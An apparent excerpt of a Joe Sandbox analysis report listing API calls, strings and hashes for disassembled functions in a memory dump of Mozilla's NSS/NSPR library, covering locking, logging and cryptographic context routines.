EnterCriticalSection.KERNEL32(?), ref: 6CAB7CB4
PR_Unlock.NSS3 ref: 6CAB7CCF

Part of subcall function 6CB4DD70: TlsGetValue.KERNEL32 ref: 6CB4DD8C
Part of subcall function 6CB4DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB4DDB4

TlsGetValue.KERNEL32 ref: 6CAB7D04
EnterCriticalSection.KERNEL32(?), ref: 6CAB7D1B
realloc.MOZGLUE(-00000050), ref: 6CAB7D82
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAB7DF4
PR_Unlock.NSS3 ref: 6CAB7E0E

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
String ID:
API String ID: 2305085145-0
Opcode ID: 679754e5fca8200b6282de696f7c552a1e3dc63b7273d45c51f2c49d2dee2636
Instruction ID: 87221e53403ddd16b4ae0c7f1b87bf3da4ac5864a3cec73e6163b6a4a9c5273f
Opcode Fuzzy Hash: 679754e5fca8200b6282de696f7c552a1e3dc63b7273d45c51f2c49d2dee2636
Instruction Fuzzy Hash: 5B51F475B081009FDB105F28DC44B6577B9FB06358F1A812EEA04E7712EB72D8D4CAA1

Function 6CA24C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6CA23921,6CC014E4,6CB6CC70), ref: 6CA24C97
EnterCriticalSection.KERNEL32(?,?,?,?,6CA23921,6CC014E4,6CB6CC70), ref: 6CA24CB0
PR_Unlock.NSS3(?,?,?,?,?,6CA23921,6CC014E4,6CB6CC70), ref: 6CA24CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6CA23921,6CC014E4,6CB6CC70), ref: 6CA24D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CA23921,6CC014E4,6CB6CC70), ref: 6CA24D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6CA23921,6CC014E4,6CB6CC70), ref: 6CA24D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6CA23921,6CC014E4,6CB6CC70), ref: 6CA24D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6CA23921,6CC014E4,6CB6CC70), ref: 6CA24D97
PR_Lock.NSS3(?,?,?,?,?,6CA23921,6CC014E4,6CB6CC70), ref: 6CA24DBA
PR_WaitCondVar.NSS3 ref: 6CA24DD4
PR_Unlock.NSS3(?,?,?,?,?,6CA23921,6CC014E4,6CB6CC70), ref: 6CA24DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6CA23921,6CC014E4,6CB6CC70), ref: 6CA24DEF

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: a9d1eef452db85f5d5b1ff1cf129572a006d0f81625529de0869cc0ccaf04cd8
Instruction ID: e799063c9f7b3bb573a300c50244bd999aacd2275a0419e0803df67ffa94572f
Opcode Fuzzy Hash: a9d1eef452db85f5d5b1ff1cf129572a006d0f81625529de0869cc0ccaf04cd8
Instruction Fuzzy Hash: C2417CB5A14A65CFCB00AFBCD484559BBF4FF05318F0A8669D8989BB01E734D8C5CB81

Function 6CBB7CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6CBB7CE0

Part of subcall function 6CB69BF0: TlsGetValue.KERNEL32(?,?,?,6CBB0A75), ref: 6CB69C07

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CBB7D36
PR_Realloc.NSS3(?,00000080), ref: 6CBB7D6D
PR_GetCurrentThread.NSS3 ref: 6CBB7D8B
PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6CBB7DC2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CBB7DD8
malloc.MOZGLUE(00000080), ref: 6CBB7DF8
PR_GetCurrentThread.NSS3 ref: 6CBB7E06

Strings

NSPR_INHERIT_FDS=%s:%d:0x%lx, xrefs: 6CBB7DF0
:%s:%d:0x%lx, xrefs: 6CBB7DB9

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
API String ID: 530461531-3274975309
Opcode ID: 7dcee79b49e50a6bfd227bc691e828c34a8c14db5f46d34d2e66aec2ace801ae
Instruction ID: bba1ac05ef0c32378476fb2d7e41a2016d4988a8f7f7d97156d7aa4a7c46d2c9
Opcode Fuzzy Hash: 7dcee79b49e50a6bfd227bc691e828c34a8c14db5f46d34d2e66aec2ace801ae
Instruction Fuzzy Hash: E541C3B19002919FDB04CF29CC809BE37B6FF84358B25456CE819BBB51DB71E845CBA2

Function 6CBB7E20 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103filestringpipeCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CBB7E37
PR_GetEnvSecure.NSS3(NSPR_INHERIT_FDS), ref: 6CBB7E46

Part of subcall function 6CA91240: TlsGetValue.KERNEL32(00000040,?,6CA9116C,NSPR_LOG_MODULES), ref: 6CA91267
Part of subcall function 6CA91240: EnterCriticalSection.KERNEL32(?,?,?,6CA9116C,NSPR_LOG_MODULES), ref: 6CA9127C
Part of subcall function 6CA91240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CA9116C,NSPR_LOG_MODULES), ref: 6CA91291
Part of subcall function 6CA91240: PR_Unlock.NSS3(?,?,?,?,6CA9116C,NSPR_LOG_MODULES), ref: 6CA912A0

PR_sscanf.NSS3(00000001,%d:0x%lx,?,?), ref: 6CBB7EAF
PR_ImportFile.NSS3(?), ref: 6CBB7ECF
PR_GetCurrentThread.NSS3 ref: 6CBB7ED6
PR_ImportTCPSocket.NSS3(?), ref: 6CBB7F01
PR_ImportUDPSocket.NSS3(?,?), ref: 6CBB7F0B
PR_ImportPipe.NSS3(?,?,?), ref: 6CBB7F15

Strings

NSPR_INHERIT_FDS, xrefs: 6CBB7E41
%d:0x%lx, xrefs: 6CBB7EA9

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Import$Socket$CriticalCurrentEnterFilePipeR_sscanfSectionSecureThreadUnlockValuegetenvstrlen
String ID: %d:0x%lx$NSPR_INHERIT_FDS
API String ID: 2743735569-629032437
Opcode ID: 8818252c9188cd6488ff10629c931c29a49497e28ad7cca3d0e0dc8f1cc147fb
Instruction ID: d7d69e1617626a27e7eb15a64de7533ea31c552b1c9645d4ad363820c0c94742
Opcode Fuzzy Hash: 8818252c9188cd6488ff10629c931c29a49497e28ad7cca3d0e0dc8f1cc147fb
Instruction Fuzzy Hash: FE312370A081D58BEB009B69C840EBFB7ACFF05348F140565E846B3A11EBB19D48C7A2

Function 6CAEECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CAEDE64), ref: 6CAEED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAEED22

Part of subcall function 6CAFB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBD18D0,?), ref: 6CAFB095

PL_FreeArenaPool.NSS3(?), ref: 6CAEED4A
PL_FinishArenaPool.NSS3(?), ref: 6CAEED6B
PR_CallOnce.NSS3(6CC02AA4,6CB012D0), ref: 6CAEED38

Part of subcall function 6CA24C70: TlsGetValue.KERNEL32(?,?,?,6CA23921,6CC014E4,6CB6CC70), ref: 6CA24C97
Part of subcall function 6CA24C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CA23921,6CC014E4,6CB6CC70), ref: 6CA24CB0
Part of subcall function 6CA24C70: PR_Unlock.NSS3(?,?,?,?,?,6CA23921,6CC014E4,6CB6CC70), ref: 6CA24CC9

SECOID_FindOID_Util.NSS3(?), ref: 6CAEED52
PR_CallOnce.NSS3(6CC02AA4,6CB012D0), ref: 6CAEED83
PL_FreeArenaPool.NSS3(?), ref: 6CAEED95
PL_FinishArenaPool.NSS3(?), ref: 6CAEED9D

Part of subcall function 6CB064F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CB0127C,00000000,00000000,00000000), ref: 6CB0650E

Strings

security, xrefs: 6CAEED06

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: 36a962eb9e9bfe605d343b1812de595d7ce4e9a4562417f21a5a465c7a16df63
Instruction ID: 5b276ea1c14c9e43f1cd6b9b062582d639c1eeff9b7acd72d553797b0bfe9232
Opcode Fuzzy Hash: 36a962eb9e9bfe605d343b1812de595d7ce4e9a4562417f21a5a465c7a16df63
Instruction Fuzzy Hash: 6F116636B002446BE7105725AC81BBF7678AF0571CF090528FC1463E81FB25A6CCEAE6

Function 6CAD2CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6CAD2CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CAD2D07

Part of subcall function 6CBB09D0: PR_Now.NSS3 ref: 6CBB0A22
Part of subcall function 6CBB09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CBB0A35
Part of subcall function 6CBB09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CBB0A66
Part of subcall function 6CBB09D0: PR_GetCurrentThread.NSS3 ref: 6CBB0A70
Part of subcall function 6CBB09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CBB0A9D
Part of subcall function 6CBB09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CBB0AC8
Part of subcall function 6CBB09D0: PR_vsmprintf.NSS3(?,?), ref: 6CBB0AE8
Part of subcall function 6CBB09D0: EnterCriticalSection.KERNEL32(?), ref: 6CBB0B19
Part of subcall function 6CBB09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CBB0B48
Part of subcall function 6CBB09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CBB0C76
Part of subcall function 6CBB09D0: PR_LogFlush.NSS3 ref: 6CBB0C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CAD2D22

Part of subcall function 6CBB09D0: OutputDebugStringA.KERNEL32(?), ref: 6CBB0B88
Part of subcall function 6CBB09D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CBB0C5D
Part of subcall function 6CBB09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CBB0C8D
Part of subcall function 6CBB09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CBB0C9C
Part of subcall function 6CBB09D0: OutputDebugStringA.KERNEL32(?), ref: 6CBB0CD1
Part of subcall function 6CBB09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CBB0CEC
Part of subcall function 6CBB09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CBB0CFB
Part of subcall function 6CBB09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CBB0D16
Part of subcall function 6CBB09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CBB0D26
Part of subcall function 6CBB09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CBB0D35
Part of subcall function 6CBB09D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CBB0D65
Part of subcall function 6CBB09D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CBB0D70
Part of subcall function 6CBB09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CBB0D90
Part of subcall function 6CBB09D0: free.MOZGLUE(00000000), ref: 6CBB0D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CAD2D3B

Part of subcall function 6CBB09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CBB0BAB
Part of subcall function 6CBB09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CBB0BBA
Part of subcall function 6CBB09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CBB0D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6CAD2D54

Part of subcall function 6CBB09D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBB0BCB
Part of subcall function 6CBB09D0: EnterCriticalSection.KERNEL32(?), ref: 6CBB0BDE
Part of subcall function 6CBB09D0: OutputDebugStringA.KERNEL32(?), ref: 6CBB0C16

Strings

pLabel = 0x%p, xrefs: 6CAD2D4F
C_InitToken, xrefs: 6CAD2CE7
pPin = 0x%p, xrefs: 6CAD2D1D
slotID = 0x%x, xrefs: 6CAD2D02
ulPinLen = %d, xrefs: 6CAD2D36

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
API String ID: 420000887-1567254798
Opcode ID: 0cca55cdaa8f2f1f18f8b90e765178d8066e33b633d024640131d566d1386706
Instruction ID: 73f128a47aea034425b4d6f9f32df3950b453b900dfce750c23f47ddf01b3ade
Opcode Fuzzy Hash: 0cca55cdaa8f2f1f18f8b90e765178d8066e33b633d024640131d566d1386706
Instruction Fuzzy Hash: 6321DD75300185EFEB009F54DE5CA993BB1EB4631DF474118E54497622DB32DC89CB71

Function 6CBB0EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6CA92357), ref: 6CBB0EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CA92357), ref: 6CBB0EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CBB0EE6

Part of subcall function 6CBB09D0: PR_Now.NSS3 ref: 6CBB0A22
Part of subcall function 6CBB09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CBB0A35
Part of subcall function 6CBB09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CBB0A66
Part of subcall function 6CBB09D0: PR_GetCurrentThread.NSS3 ref: 6CBB0A70
Part of subcall function 6CBB09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CBB0A9D
Part of subcall function 6CBB09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CBB0AC8
Part of subcall function 6CBB09D0: PR_vsmprintf.NSS3(?,?), ref: 6CBB0AE8
Part of subcall function 6CBB09D0: EnterCriticalSection.KERNEL32(?), ref: 6CBB0B19
Part of subcall function 6CBB09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CBB0B48
Part of subcall function 6CBB09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CBB0C76
Part of subcall function 6CBB09D0: PR_LogFlush.NSS3 ref: 6CBB0C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CBB0EFA

Part of subcall function 6CA9AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CA9AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBB0F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBB0F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBB0F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBB0F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6CBB0ED9, 6CBB0EE5, 6CBB0F06, 6CBB0F0B
Aborting, xrefs: 6CBB0EB3

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: 8e7784d25078a518789045ecc5a535734b807f853e5c134558a887de7f95459a
Instruction ID: 527920eb08dd25d502c9fba747a2cd9e27c9a398d35a7c6ed6fa69e14de1e73f
Opcode Fuzzy Hash: 8e7784d25078a518789045ecc5a535734b807f853e5c134558a887de7f95459a
Instruction Fuzzy Hash: A7F0A4F99001687BEA107B60AC4ACAF3E3DDF46764F004024FD1957702DA35ED5896B2

Function 6CB14DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6CB14DCB

Part of subcall function 6CB00FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CAA87ED,00000800,6CA9EF74,00000000), ref: 6CB01000
Part of subcall function 6CB00FF0: PR_NewLock.NSS3(?,00000800,6CA9EF74,00000000), ref: 6CB01016
Part of subcall function 6CB00FF0: PL_InitArenaPool.NSS3(00000000,security,6CAA87ED,00000008,?,00000800,6CA9EF74,00000000), ref: 6CB0102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6CB14DE1

Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB010F3
Part of subcall function 6CB010C0: EnterCriticalSection.KERNEL32(?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0110C
Part of subcall function 6CB010C0: PL_ArenaAllocate.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01141
Part of subcall function 6CB010C0: PR_Unlock.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01182
Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6CB14DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB14E59

Part of subcall function 6CAFFAB0: free.MOZGLUE(?,-00000001,?,?,6CA9F673,00000000,00000000), ref: 6CAFFAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBD300C,00000000), ref: 6CB14EB8
SECOID_FindOID_Util.NSS3(?), ref: 6CB14EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6CB14F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB1521A

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: d6c5f25e18362c44298777639aa95de8e0d930688cd1590a25cbad1b0b5b378a
Instruction ID: 9f9688f1bfab67b49d5513f408af4245df3187c63ad285e2c826c6eda4fe4ba7
Opcode Fuzzy Hash: d6c5f25e18362c44298777639aa95de8e0d930688cd1590a25cbad1b0b5b378a
Instruction Fuzzy Hash: 80F199B1E082498FDB08CF54D8407AEB7B2FF49318F254129E815ABB81E735E985CF91

Function 6CB10C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6CB12C2A), ref: 6CB10C81

Part of subcall function 6CAFBE30: SECOID_FindOID_Util.NSS3(6CAB311B,00000000,?,6CAB311B,?), ref: 6CAFBE44

Part of subcall function 6CAE8500: SECOID_GetAlgorithmTag_Util.NSS3(6CAE95DC,00000000,00000000,00000000,?,6CAE95DC,00000000,00000000,?,6CAC7F4A,00000000,?,00000000,00000000), ref: 6CAE8517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB10CC4

Part of subcall function 6CAFFAB0: free.MOZGLUE(?,-00000001,?,?,6CA9F673,00000000,00000000), ref: 6CAFFAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CB10CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6CB10D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6CB10D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6CB10D7D
free.MOZGLUE(00000000), ref: 6CB10DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB10DC1
free.MOZGLUE(00000000), ref: 6CB10DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB10E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CB10E0F

Part of subcall function 6CAE95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CAC7F4A,00000000,?,00000000,00000000), ref: 6CAE95E0
Part of subcall function 6CAE95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CAC7F4A,00000000,?,00000000,00000000), ref: 6CAE95F5
Part of subcall function 6CAE95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CAE9609
Part of subcall function 6CAE95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CAE961D
Part of subcall function 6CAE95C0: PK11_GetInternalSlot.NSS3 ref: 6CAE970B
Part of subcall function 6CAE95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CAE9756
Part of subcall function 6CAE95C0: PK11_GetIVLength.NSS3(?), ref: 6CAE9767
Part of subcall function 6CAE95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CAE977E
Part of subcall function 6CAE95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAE978E

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
